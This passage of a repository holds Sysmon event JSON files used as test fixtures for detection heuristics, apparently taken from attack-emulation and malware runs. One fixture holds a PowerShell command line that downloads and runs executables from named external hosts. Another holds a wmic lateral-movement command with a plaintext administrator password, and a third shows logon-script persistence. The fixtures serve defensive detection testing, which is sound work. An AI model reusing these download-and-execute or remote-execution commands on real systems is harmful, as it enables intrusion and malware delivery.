"Version": "2" 150 | } 151 | } 152 | } 153 | { 154 | "Event": { 155 | "EventData": { 156 | "CreationUtcTime": "2018-02-02 13:16:59.383", 157 | "Image": 
"C:\\Windows\\SysWOW64\\certutil.exe", 158 | "ProcessGuid": "49F1AF32-64CB-5A74-0000-00101C630900", 159 | "ProcessId": "1924", 160 | "TargetFilename": "C:\\ProgramData\\Q1S5F1P6.exe", 161 | "UtcTime": "4242-04-24 13:37:42.422" 162 | }, 163 | "System": { 164 | "Channel": "Microsoft-Windows-Sysmon/Operational", 165 | "Computer": "BLAHBLAH", 166 | "Correlation": {}, 167 | "EventID": "11", 168 | "EventRecordID": "104116", 169 | "Execution": { 170 | "ProcessID": "1376", 171 | "ThreadID": "1964" 172 | }, 173 | "Keywords": "0x8000000000000000", 174 | "Level": "4", 175 | "Opcode": "0", 176 | "Provider": { 177 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 178 | "Name": "Microsoft-Windows-Sysmon" 179 | }, 180 | "Security": { 181 | "UserID": "S-1-5-18" 182 | }, 183 | "Task": "11", 184 | "TimeCreated": { 185 | "SystemTime": "4242-04-24 13:37:42.422" 186 | }, 187 | "Version": "2" 188 | } 189 | } 190 | } 191 | -------------------------------------------------------------------------------- /tests/HeurMaliciousAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+2730e|C:\\Windows\\System32\\appresolver.dll+21e48|C:\\Windows\\System32\\appresolver.dll+1eed6|C:\\Windows\\System32\\appresolver.dll+1ec47|C:\\Windows\\Explorer.EXE+2986a|C:\\Windows\\Explorer.EXE+296f8|C:\\Windows\\Explorer.EXE+409b4|C:\\Windows\\Explorer.EXE+765e7|C:\\Windows\\Explorer.EXE+403f4|C:\\Windows\\Explorer.EXE+3f5e5|C:\\Windows\\Explorer.EXE+3eadc|C:\\Windows\\Explorer.EXE+66cd5|C:\\Windows\\Explorer.EXE+712e8|C:\\Windows\\System32\\USER32.dll+1681d|C:\\Windows\\System32\\USER32.dll+163ec|C:\\Windows\\System32\\USER32.dll+51a0|C:\\Windows\\SYSTEM32\\ntdll.dll+9fdb4|UNKNOWN(FFFFF8022B270085)|UNKNOWN(FFFFF40FE007C31C)|UNKNOWN(FFFFF40FE00A519E)|UNKNOWN(FFFFF40FE00A4627)|UNKNOWN(FFFFF40FE00A2715)|UNKNOWN(FFFFF40FE00A1E06)", 5 | 
"GrantedAccess": "0x1410", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\FakedEvent.EXE", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{515cd0d1-4b0c-5d3f-0000-0010aa7b0500}", 10 | "SourceProcessId": "4768", 11 | "SourceThreadId": "4932", 12 | "SourceUser": "DESKTOP-LJRVE06\\Generic", 13 | "TargetImage": "C:\\Windows\\System32\\VBoxTray.exe", 14 | "TargetIntegrityLevel": "Medium", 15 | "TargetParentProcessGuid": "{deadbeef}", 16 | "TargetProcessGUID": "{515cd0d1-4b27-5d3f-0000-0010d0710a00}", 17 | "TargetProcessId": "3484", 18 | "TargetUser": "DESKTOP-LJRVE06\\Generic", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "10", 26 | "EventRecordID": "7679371", 27 | "Execution": { 28 | "ProcessID": "892", 29 | "ThreadID": "1536" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "10", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "3" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/HeurZipExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\test.vbs\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Microsoft ® Windows Based Script Host", 8 | "FileVersion": "5.8.7600.16385", 9 | "Hashes": 
"SHA1=851BD390BF559E702B8323062DBEB251D9F2F6F7,MD5=8886E0697B0A93C521F99099EF643450,SHA256=D73F7EE4E6E992A618D02580BDBF4FD6BA7C683D110928001092F4073341E95F,IMPHASH=7B5674BD1C2BBF9E981DAD834013AF2E", 10 | "Image": "C:\\Windows\\System32\\wscript.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 13 | "LogonId": "0x4b57e", 14 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 15 | "ParentImage": "C:\\Windows\\explorer.exe", 16 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 17 | "ParentProcessId": "2284", 18 | "ProcessGuid": "{49F1AF32-DD57-5B05-0000-00101B280900}", 19 | "ProcessId": "2236", 20 | "Product": "Microsoft ® Windows Script Host", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\calduser2", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "908829", 31 | "Execution": { 32 | "ProcessID": "1404", 33 | "ThreadID": "1732" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe\" ", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Windows Command Processor", 60 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 61 | "Hashes": 
"SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 62 | "Image": "C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe", 63 | "IntegrityLevel": "Medium", 64 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 65 | "LogonId": "0x4b57e", 66 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 67 | "ParentImage": "C:\\Windows\\explorer.exe", 68 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 69 | "ParentProcessId": "2284", 70 | "ProcessGuid": "{49F1AF32-E29B-5B05-0000-001004911600}", 71 | "ProcessId": "1092", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "1", 74 | "User": "CALDERA\\calduser2", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "915850", 83 | "Execution": { 84 | "ProcessID": "1404", 85 | "ThreadID": "1732" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /tests/LargeCL512.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "PowerShell \"'PowerShell \"\"function Ktuakce([String] $dwjdasoigb){(New-Object System.Net.WebClient).DownloadFile($dwjdasoigb,''C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Yvfytc.exe'');Start-Process 
''C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Yvfytc.exe'';}try{Ktuakce(''http://www.events4u.cz/kas23.png'')}catch{Ktuakce(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Ryvqma-cgs.bat;Start-Process 'C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Ryvqma-cgs.bat' -WindowStyle Hidden\"", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Desktop\\", 6 | "Hashes": "SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C", 7 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "49F1AF32-4475-59DB-0000-0020B8040100", 10 | "LogonId": "0x000104b8", 11 | "ParentCommandLine": "cmd /c PowerShell \"'PowerShell \"\"function Ktuakce([String] $dwjdasoigb){(New-Object System.Net.WebClient).DownloadFile($dwjdasoigb,''%TMP%\\Yvfytc.exe'');Start-Process ''%TMP%\\Yvfytc.exe'';}try{Ktuakce(''http://www.events4u.cz/kas23.png'')}catch{Ktuakce(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath %TMP%\\Ryvqma-cgs.bat;Start-Process '%TMP%\\Ryvqma-cgs.bat' -WindowStyle Hidden\"", 12 | "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe", 13 | "ParentProcessGuid": "49F1AF32-5913-59DB-0000-0010023D3100", 14 | "ParentProcessId": "1564", 15 | "ProcessGuid": "49F1AF32-5913-59DB-0000-00101D483100", 16 | "ProcessId": "788", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "230989", 27 | "Execution": { 28 | "ProcessID": "2160", 29 | "ThreadID": "2380" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": 
{ 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/LateralWMI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "WMI Commandline Utility", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 10 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-3AE6-5AC7-0000-0010FA181400}", 19 | "ProcessId": "2208", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "914937", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": 
"0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "WMI Commandline Utility", 60 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 61 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 62 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-3B60-5AC7-0000-001086C41400}", 71 | "ProcessId": "2484", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "917156", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": 
"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "WMI Commandline Utility", 112 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 113 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 114 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\commander.exe -f", 119 | "ParentImage": "C:\\commander.exe", 120 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 121 | "ParentProcessId": "920", 122 | "ProcessGuid": "{49F1AF32-3BDB-5AC7-0000-00105C451800}", 123 | "ProcessId": "1884", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "919654", 135 | "Execution": { 136 | "ProcessID": "1456", 137 | "ThreadID": "1712" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": 
"Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/MaliciousSvchostAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 7 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 8 | "SourceProcessId": "2412", 9 | "SourceThreadId": "3348", 10 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 11 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 12 | "TargetProcessId": "820", 13 | "UtcTime": "4242-04-24 13:37:42.422" 14 | }, 15 | "System": { 16 | "Channel": "Microsoft-Windows-Sysmon/Operational", 17 | "Computer": "BLAHBLAH", 18 | "Correlation": {}, 19 | "EventID": "10", 20 | "EventRecordID": "145999", 21 | "Execution": { 22 | "ProcessID": "1324", 23 | "ThreadID": "1940" 24 | }, 25 | "Keywords": "0x8000000000000000", 26 | "Level": "4", 27 | "Opcode": "0", 28 | "Provider": { 29 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 30 | "Name": "Microsoft-Windows-Sysmon" 31 | }, 32 | "Security": { 33 | "UserID": "S-1-5-18" 34 | }, 35 | "Task": "10", 36 | "TimeCreated": { 37 | "SystemTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "Version": "3" 40 | } 41 | } 42 | } 43 | { 44 | "Event": { 45 | "EventData": { 46 | "CallTrace": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 47 | "GrantedAccess": "0x1f1fff", 48 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 49 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 50 | "SourceProcessId": "2412", 51 | "SourceThreadId": "3348", 52 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 53 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 54 | "TargetProcessId": "820", 55 | "UtcTime": "4242-04-24 13:37:42.422" 56 | }, 57 | "System": { 58 | "Channel": "Microsoft-Windows-Sysmon/Operational", 59 | "Computer": "BLAHBLAH", 60 | "Correlation": {}, 61 | "EventID": "10", 62 | "EventRecordID": "145999", 63 | "Execution": { 64 | "ProcessID": "1324", 65 | "ThreadID": "1940" 66 | }, 67 | "Keywords": "0x8000000000000000", 68 | "Level": "4", 69 | "Opcode": "0", 70 | "Provider": { 71 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 72 | "Name": "Microsoft-Windows-Sysmon" 73 | }, 74 | "Security": { 75 | "UserID": "S-1-5-18" 76 | }, 77 | "Task": "10", 78 | "TimeCreated": { 79 | "SystemTime": "4242-04-24 13:37:42.422" 80 | }, 81 | "Version": "3" 82 | } 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /tests/Nbtstat.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"nbtstat\" -n", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "TCP/IP NetBios Information", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=68DBA140959ED155F720060C5466F5FD90A176F6,MD5=D6A9FE571146099D6D75A8E4E7871506,SHA256=F63D1A87E8D264321BD2EF30B017758EF77CF741849F3F7F214BB169C0C9A461,IMPHASH=FD8908AC8524F3754D53A83833416369", 10 | "Image": 
"C:\\Windows\\System32\\nbtstat.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-38D6-5AC7-0000-0010643B0D00}", 19 | "ProcessId": "2912", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "898632", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/NewAutorun.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 5 | "EventType": "SetValue", 6 | "Image": "C:\\Programdata\\Q7Y9F5Z1.exe", 7 | "ProcessGuid": "{49F1AF32-0032-5AD6-0000-00104E2E0E00}", 8 | "ProcessId": "2884", 9 | "TargetObject": "HKU\\S-1-5-21-2888932017-1170430559-1631822473-1000\\Environment\\UserInitMprLogonScript", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 
16 | "EventID": "13", 17 | "EventRecordID": "36442", 18 | "Execution": { 19 | "ProcessID": "2948", 20 | "ThreadID": "3028" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "13", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 44 | "EventType": "SetValue", 45 | "Image": "C:\\Programdata\\Q1S5F1P6.exe", 46 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 47 | "ProcessId": "2688", 48 | "TargetObject": "HKU\\S-1-5-21-2888932017-1170430559-1631822473-1000\\Environment\\UserInitMprLogonScript", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 | "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "13", 56 | "EventRecordID": "104965", 57 | "Execution": { 58 | "ProcessID": "1376", 59 | "ThreadID": "1964" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "13", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | { 80 | "Event": { 81 | "EventData": { 82 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 83 | "EventType": "SetValue", 84 | "Image": "C:\\Programdata\\Q1S5F1P6.exe", 85 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 86 | "ProcessId": "2688", 87 | "TargetObject": "HKCR\\WOW6432Node\\CLSID\\{21FFB6C0-0DA1-11D5-A9D5-00500413153C}\\ibprdo", 88 | "UtcTime": "4242-04-24 
13:37:42.422" 89 | }, 90 | "System": { 91 | "Channel": "Microsoft-Windows-Sysmon/Operational", 92 | "Computer": "BLAHBLAH", 93 | "Correlation": {}, 94 | "EventID": "13", 95 | "EventRecordID": "104965", 96 | "Execution": { 97 | "ProcessID": "1376", 98 | "ThreadID": "1964" 99 | }, 100 | "Keywords": "0x8000000000000000", 101 | "Level": "4", 102 | "Opcode": "0", 103 | "Provider": { 104 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 105 | "Name": "Microsoft-Windows-Sysmon" 106 | }, 107 | "Security": { 108 | "UserID": "S-1-5-18" 109 | }, 110 | "Task": "13", 111 | "TimeCreated": { 112 | "SystemTime": "4242-04-24 13:37:42.422" 113 | }, 114 | "Version": "2" 115 | } 116 | } 117 | } 118 | -------------------------------------------------------------------------------- /tests/NewExeCreatedInRoot.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-04-06 09:16:19.947", 5 | "Image": "System", 6 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 7 | "ProcessId": "4", 8 | "TargetFilename": "C:\\commander.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "239376", 17 | "Execution": { 18 | "ProcessID": "1568", 19 | "ThreadID": "1984" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /tests/OfficeDropper.json: 
